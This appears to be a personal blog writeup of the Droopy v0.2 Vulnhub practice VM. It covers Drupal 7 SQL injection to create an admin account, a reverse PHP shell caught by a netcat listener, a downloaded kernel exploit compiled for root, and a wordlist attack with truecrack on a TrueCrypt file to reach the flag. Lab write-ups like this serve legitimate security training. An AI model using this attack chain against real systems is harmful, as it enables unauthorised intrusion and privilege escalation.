Posted in Penetration Testing, web app testing

Droopy v0.2 Vulnhub Writeup

I’ve been working on this epic VM for a day now. I am using Vulnhub to get a feel for how the labs are in the OSCP course/exam. I won’t lie. I did look up a few tutorials just to get a feel for how it all went as I was totally clueless as to how to attack this one. However, most of the tutorials left out big chunks of how to do this and most of my time was spent ironing out the creases. Whether that was deliberate of the authors of the tutorials remains to be seen.

This is a big one and the amount I’ve learned from this has been amazing.

Droopy v0.2 VM

After having some grim issues with VirtualBox I set about port scanning with nmap

nmapScan

I see that on port 80 we have Drupal 7. I went straight to my browser and went to the IP address of the server.

Website

I looked over a few tutorials on how to attack Drupal 7 and found that a lot of the links were dead or the scripts just gave me errors. I went to Exploit-DB and searched around for a bit. This particular version of Drupal was vulnerable to an SQL Injection that created an admin account. Exploit-DB gave details of a Python script called ‘drupalSQLi.py’ that could so just the job, however, it gave a few errors on running. I went to google for the ‘drupalSqli.py’ and found it on this site

https://www.homelab.it/index.php/2014/10/17/drupal-7-sql-injection/

After I downloaded the script, unpacked it and the like I ran this in terminal

python drupalsqli.py -t IPADDRESS -u admin -p admin

pythonSQLi

SUCCESS!!

GotAdmin

I logged in with my newly created credentials. In some tutorials it mentioned that you had to enable the ‘PHP Filter’ Some then went off on path I was unfamiliar with.

phpfilter

After saving this setting change, I went back into the Module settings and changed something else.

phpCodeText

This setting would enable the post to be treated as PHP Code. After a few attempts this was my conclusion.

I already had the ‘ReversePHPShell.PHP’ file from PentestMonkey so i created a new post and pasted the PHP code into the text field. Called it ‘test’ and saved the blog post.

Be sure to edit the link back IP address to your box IP  in the reverse PHP code.

I created a netcat listener

nc -lnvp 1234

Refreshed the homepage of the website and got shell.

netcat

Most people after this worked in this mode. One person gave a good tip that I found really useful. Inserting the below Python script turns the shell into a familiar BASH type terminal

pythonBash

It’s handy because it lets you know where you are at any one time. It’s actually useful later.

Now we need to get ROOT

We are currently in Shell as a normal user. How do we get root from here? By this point I was still kind of following the tutorial and filling in the blanks as I went. I knew it wasn’t going to be straight forward and it wasn’t.

We need to change directory to a writable folder.

cd /tmp/

In some tutorials they talked about ubuntu 14.04 being vulnerable to a Priv Esc exploit using a program written in C. I spent a large portion of my time trying to get this to work as it wasn’t clear on any of the tutorials.

In the /tmp/ directory while still in shell on the server type this command in

wget https://www.exploit-db.com/download/37292

Once you have downloaded the 37292 file you need to do something that everyone misses out. Add a file extension.

mv 37292 37292.c

I received no end of errors trying to compile that 37292 file until I done the above step.

Now that we have a recognized ‘C’ file we can compile it. The below image will detail the steps taken.

PrivEsc

In essence we did this

  • downloaded the 37292 file
  • renamed it 37292.c
  • compiled it using gcc and output it as privesc
  • made it executable by using chmod +x
  • run it with ./privesc
  • Quick ‘whoami’ shows us as ‘root’

YAAY! ROOT

Sadly this is where a lot of the still live tutorials stopped. They got root and that was the end of it. According to the VM spec there was a flag we had to find. A couple of people went further but they weren’t too open about how it was done. Again this could be deliberate so I had to investigate further.

In the ROOT directory there is a file ‘dave.tc’ On further investigation this is a TrueCrypt file. Software that encrypts drives and file systems and is no longer supported or maintained. Hmm. A few authors used ‘TrueCrack’ to crack the encrypted ‘dave.tc’ file system. However, there’s some things we need to do first.

Rockyou.txt & emails

Some authors glazed over the fact that you could navigate to /var/mail/ and read the email hint that was left on the server. In fact you had to ‘cat www-data’ to read the email hint.

cat www-data

email

When you’re learning Pen Testing, you do use the ‘RockYou.txt’ wordlist file a lot when brute forcing logins created for us N00bs. It was the first thing that popped out at me when I read this hint.

By this point all the tutorials tell you to grep a file and out output the contents to a new file for use later. Following these tutorials will have your next step fail. Here is the steps to take. Navigate to;

/usr/share/wordlists/

Enter this command

grep “academy” rockyou.txt | cut -d “:” -f2 > /root/rockacad.txt

This command is different to all the tutorials as it pulls the passwords only from the rockyou.txt file. If you follow the other tutorials you will end up with a file with these contents.

username:password

This will fail in the truecrack attempt. The above grep command searches the file for anything related to ‘academy’ and cuts out the right column where the delimiter is ‘:’

It took me a few attempts to figure out why the TrueCrack command was failing.

dave.tc

We’re still not in the clear. We can’t run ‘TrueCrack’ in the shell so we need to get access to the ‘dave.tc’ file on our local system to crack it.

After a few failed attempts I found a working solution.

mv dave.tc /var/www/sites/html/

This moves the ‘dave.tc’ file to a location in the root of the website so we can use ‘wget’ in local terminal to grab the file.

Now in a separate terminal window (CTRL+ALT+T) we can run

wget http://ipaddress of site/dave.tc

This runs and we get a copy of ‘dave.tc’ in our current working directory.

TrueCrack

Truecrack will attempt to crack ‘TrueCrypt’ files with a given wordlist. Knowing that our previous work on should be useful given the email hint lets give it a crack.

truecrack

From the image we’ve cracked the password for the ‘dave.tc’ encrypted file system.

The password was ‘eatonacademy’ The command used was

truecrack –truecrypt ./dave.tc –key sha512 –wordlist rockacad.txt

VeraCrypt

Since TrueCrypt isn’t easily available I had to search an alternative. Veracrypt seemed like a good idea. I installed it, decrypted the drive, mounted it and searched through the directories. Some are hidden, however, at this stage I don’t want to give the whole game away, but, it’s fairly easy after you’ve mounted the drive.

The result?

Flag

There was a lot of gap filling in this one, and I’m glad people leave things out of tutorials. It makes you think more and it helps edge you closer.

But you got some help?

Vulnhub has been an amazing place to play. The VM’s are nothing like Metasploitable 2, static websites or live boxes. They are designed to make you think. I needed to break out of the prescribed path for trainees. Sometimes you just need to look up tutorials to get a step for a hint. The lessons I’ve learned doing these Vulnhub VMs will certainly be useful at some point. Documenting the progress will be a reference point for later use.

 

Thanks!!

Thanks to Vulnhub for hosting the VM and to knightmare for creating it.

Advertisements

One thought on “Droopy v0.2 Vulnhub Writeup

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s